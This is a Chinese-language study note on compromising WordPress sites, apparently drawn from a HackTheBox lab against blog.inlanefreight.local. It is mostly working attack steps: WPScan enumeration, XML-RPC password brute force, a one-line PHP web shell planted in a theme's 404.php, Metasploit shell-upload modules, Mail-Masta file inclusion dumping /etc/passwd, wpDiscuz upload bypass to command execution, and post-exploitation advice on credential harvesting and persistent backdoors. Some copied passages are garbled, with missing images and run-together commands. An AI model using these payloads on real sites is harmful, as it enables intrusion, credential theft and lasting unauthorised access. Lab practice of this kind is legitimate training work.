Wordpress

1. 發現點

1️⃣ 瀏覽 `robots.txt`

curl -s http://blog.inlanefreight.local/robots.txt

有時會列出隱藏路徑

2️⃣ 確認 CMS

curl -s http://blog.inlanefreight.local | grep WordPress

出現 WordPress 5.8 即可確認

3️⃣ 確認主題 & 插件

curl -s http://blog.inlanefreight.local/ | grep themes
curl -s http://blog.inlanefreight.local/ | grep plugins
curl -s http://blog.inlanefreight.local/?p=1 | grep plugins

透過路徑 /wp-content/themes/ 同 /wp-content/plugins/ 可以知道網站用咩主題/插件。

2. 測試Payload

1️⃣ 使用 WPScan

sudo gem install wpscan
sudo wpscan --url http://blog.inlanefreight.local --enumerate --api-token <你的token>

列出用戶、主題、插件、版本、已知漏洞

2️⃣ 用戶爆破（XML-RPC）

sudo wpscan --password-attack xmlrpc -t 20 -U john -P /usr/share/wordlists/rockyou.txt --url http://blog.inlanefreight.local

如果爆破成功例如：

Username: john
Password: firebird1

即可以用 admin 身份登入 http://blog.inlanefreight.local/wp-login.php。

3. 後台取得 RCE

方法 A：修改主題檔案取得 WebShell

後台登入之後，去

外觀 > 主題檔案編輯器 (Appearance > Theme Editor)

選一個主題（例如 twentynineteen），然後選 404.php
在底部加入：

<?php system($_GET[0]); ?>

儲存並透過 cURL 測試：

curl http://blog.inlanefreight.local/wp-content/themes/twentynineteen/404.php?0=id

出現 uid=33(www-data) 就成功！

方法 B：Metasploit 模組自動上傳 shell

msf6 > use exploit/unix/webapp/wp_admin_shell_upload
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set rhosts blog.inlanefreight.local
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set username john
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set password firebird1
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set lhost <你的IP>
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set vhost blog.inlanefreight.local
msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit

成功就會開一個 meterpreter session。

Complete Version

PHP 外掛

可能可以將.php 檔案上傳為外掛。使用以下範例建立你的 php 後門：

然後新增一個插件：

上傳外掛程式並按立即安裝：

點選“處理”：

顯然這可能不會產生任何效果，但如果你進入媒體，你會看到你的 shell 已上傳：

存取它，你會看到執行反向shell的URL：

上傳並啟用惡意插件

（此部分複製自 https://www.hackingarticles.in/wordpress-reverse-shell/）

有時候登入使用者沒有可寫的權限來對WordPress主題進行修改，所以我們選擇「注入WP pulgin惡意程式碼」作為取得web shell的替代策略。

因此，一旦您可以存取 WordPress 儀表板，您就可以嘗試安裝惡意外掛程式。這裡我已經從exploit db下載了有漏洞的插件。

點擊此處 **下載插件進行練習。

由於我們有插件的 zip 文件，現在是時候上傳插件了。

儀表板 > 插件 > 上傳插件

瀏覽下載的 zip 文件，如圖所示。

一旦包成功安裝，我們需要啟動插件。

當一切設定好之後就可以進行利用了。由於我們安裝了名為“reflex-gallery”的易受攻擊的插件，因此它很容易被利用。

您將在 Metasploit 框架內利用此漏洞，從而載入以下模組並執行以下命令：

1234

使用exploit/unix/webapp/wp_slideshowgallery_uploadset rhosts 192.168.1.101set targeturi /wordpressexploit

執行上述命令後，您將擁有 meterpreter 會話。如本文所述，有許多方法可以利用 WordPress 平台網站。

4. 已知漏洞利用

1️⃣ Mail-Masta 插件 RFI（Remote File Inclusion）

測試：

curl -s "http://blog.inlanefreight.local/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd"

如果成功顯示 /etc/passwd，代表存在 RFI，進一步可利用上傳本地 payload。

2️⃣ wpDiscuz 文件上傳繞過（版本 <= 7.0.4）

利用腳本上傳 PHP webshell：

python3 wp_discuz.py -u http://blog.inlanefreight.local -p /?p=1

用 cURL 測試：

curl -s http://blog.inlanefreight.local/wp-content/uploads/2021/08/<shell>.php?cmd=id

出現 uid=33(www-data)，即 RCE 成功。

5.利用已知漏洞

易受攻擊的插件 - mail-masta

<?php 

include($_GET['pl']);
global $wpdb;

$camp_id=$_POST['camp_id'];
$masta_reports = $wpdb->prefix . "masta_reports";
$count=$wpdb->get_results("SELECT count(*) co from  $masta_reports where camp_id=$camp_id and status=1");

echo $count[0]->co;

?>

我們可以看到， pl參數允許我們包含一個文件，而無需任何類型的輸入驗證或清理。利用這個，我們可以在網頁伺服器上包含任意檔案。讓我們利用這一點來使用cURL檢索/etc/passwd檔案的內容。

PikachuN@htb[/htb]$ curl -s http://blog.inlanefreight.local/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
ubuntu:x:1000:1000:ubuntu:/home/ubuntu:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
mysql:x:113:119:MySQL Server,,,:/nonexistent:/bin/false

易受攻擊的外掛 - wpDiscuz

wpDiscuz是一個 WordPress 插件，用於增強頁面貼文的評論功能。在撰寫本文時，該插件的下載量已超過 160 萬次，活躍安裝量超過 90,000 次，這使它成為我們很有可能在評估期間遇到的非常受歡迎的插件。根據版本號（7.0.4），此漏洞很有可能讓我們獲得命令執行。該漏洞的關鍵是文件上傳繞過。 wpDiscuz 僅允許圖像附件。檔案 mime 類型功能可能會被繞過，從而允許未經身份驗證的攻擊者上傳惡意 PHP 檔案並獲得遠端程式碼執行。關於 MIME 類型偵測功能繞過的更多資訊可以在這裡找到。

python3 wp_discuz.py -u http://blog.inlanefreight.local -p /?p=1

所寫的漏洞可能會失敗，但是我們可以使用cURL使用上傳的 Web shell 執行命令。我們只需要在.php副檔名後面附加?cmd=即可執行我們可以在漏洞腳本中看到的指令。

curl -s http://blog.inlanefreight.local/wp-content/uploads/2021/08/uthsdkbywoxeebg-1629904090.8191.php?cmd=id

GIF689a;

uid=33(www-data) gid=33(www-data) groups=33(www-data)

6. 連鎖漏洞

一旦取得 webshell / meterpreter session，可以進一步：

攻擊動作

方法

提權

sudo -l 檢查 sudo 權限、或找可寫 cron 任務

密碼收集

檢查 wp-config.php 抓取資料庫帳密

內網掃描

netstat -anp 或 nmap -sP 內部段

橫向移動

試用相同帳密登入其他服務

持久化後門

在 /wp-content/uploads 或 /themes 留下反向 shell

最后更新于9个月前

这有帮助吗？